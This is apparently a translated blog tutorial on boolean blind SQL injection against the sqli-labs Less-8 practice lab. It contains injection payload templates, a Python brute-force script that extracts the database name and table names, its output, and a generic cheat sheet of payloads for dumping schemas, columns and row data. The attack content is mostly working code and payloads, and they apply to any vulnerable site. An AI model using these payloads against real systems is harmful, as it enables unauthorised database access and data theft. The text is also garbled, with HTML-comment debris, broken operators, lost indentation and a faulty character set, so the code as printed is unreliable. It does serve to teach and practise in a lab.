SQL injection blind injection operation
Recently, when I was studying SQL injection, I was more interested in the gameplay of blind injection. I wrote some python scripts about blind injection. This environment is for the eighth level of sqlilabs. Similar modifications can be made in other scenarios.
1. Exploding database length
payload:' and length(database())={<!-- -->}-- + //{<!-- -->} is the blasting location
2. Explode every database character
payload:' and substr(database(),{},1)={} //The first {} corresponds to the index of the database name, and the second {} corresponds to the index value
3. Explode the number of tables in the corresponding database
payload:' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- + //The first {} corresponds to the specified database name, and the second {} corresponds to the table number
4. Explode the length of the corresponding database table
payload:' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- + //The filling bits are the database name, table serial number, and table length
5. Explode the name of the table corresponding to the database
payload:' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- +
6. Code display
The drag library also uses a similar payload. The source code is given below. My environment is built locally, and the url is “http://sqlilabs/Less-8/?id=1”.
#### Blind injection to obtain data
import requests
import time
header = {<!-- -->
"Host": "sqlilabs",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60",
"Accept": "text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q =0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Connection": "close"
}
chars = "abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^ & amp;*()_ + <>?"
url = "http://sqlilabs/Less-8/?id=1"
length_payload = "' and length(database())={}-- + "
def get_length(url, length_payload):
for x in range(1, 50):
ex_url = url + length_payload.format(x)
print(ex_url)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
# print(response.text)
print("The length is" + str(x))
return x
length = get_length(url, length_payload)
data_payload = "' and (substr(database(),{},1))='{}'-- + "
def get_data(url, data_payload, length):
data = ""
start_time = time.time()
for x in range(1, length + 1):
for char in chars:
ex_url = url + data_payload.format(x, char)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
data + = char
print("data is" + data)
break
end_time = time.time()
print("The time taken is: {}".format(end_time - start_time))
# print(response.text)
return data
name = get_data(url, data_payload, length)
print("Database name: " + name)
table_count_payload = "' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- + "
def get_table(url, table_payload, db_name):
for x in range(1, 50):
ex_url = url + table_payload.format(db_name, x)
print(ex_url)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
# print(response.text)
print("The number of tables is" + str(x))
return x
table_count = get_table(url, table_count_payload, name)
table_length_payload = "' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- + "
table_name_payload = "' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- + "
def get_table_name(url, table_length_payload=table_length_payload, table_name_payload=table_name_payload,
table_count=table_count, db__name=name):
table_list=[];
start_time = time.time()
for i in range(1, table_count + 1):
data = ""
# Determine the length of the table
for len in range(1, 50):
ex_url = url + table_length_payload.format(db__name, i - 1, len)
response = requests.get(ex_url, headers=header)
# print(ex_url)
if "You are in" in response.text:
# print(response.text)
# print("The length of the {}th table is {}".format(i, len))
# Find table name
for j in range(1, len + 1):
for char in chars:
ex_url2 = url + table_name_payload.format(db__name, i - 1, j, char)
# print(ex_url2)
response = requests.get(ex_url2, headers=header)
if "You are in" in response.text:
data + = char
# print("data is" + data)
break
table_list.append(data)
break
end_time = time.time()
# print("The {}th table name is {}".format(i, data))
print("The time taken is: {}".format(end_time - start_time))
return table_list
print(get_table_name(url))
7. Result display
Run it and see the results.
The length is 8 data is s The data is se The data is sec data is secu data is secur data is securi data is securit Data is security The time used is: 1.7992594242095947 Database name: security The number of tables is 4 The time used is: 6.969999313354492 ['emails', 'referers', 'uagents', 'users']
I have commented the payload output here. If you want to see the payload, you can print it yourself.
8. Common blind injection payloads
Let me summarize the common SQL blind injection payloads:
Explode database length:' and length((select schema_name from information_schema.schemata limit 0,1))={}-- +
Explode database name: ' and substring((select schema_name from information_schema.schemata limit 0,1),{},1)={}-- +
Explode the number of tables in the specified database: ' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- +
Specify the length of the table in the database: ' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- +
Specify the name of the table under the database: ' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- +
The number of fields in the table: ' and (select count(column_name) from information_schema.columns where table_schema={} and tabe_name='{}')={}-- +
The field length of the burst table: ' and (select length(column_name) from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1)={}-- +
The field name of the burst table:' and substr((select column_name from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1),{},1)='{}'-- +
Explode the number of data in the specified table: ' and (select count(*) from {})={}-- +
Explode the length of the specified field under the specified table: ' and length(substr((select {} from {} limit 0,1),1))={}-- +
Explode the specified field data under the specified table: ' and substr((select {} from {} limit 0,1),1,1)={}-- +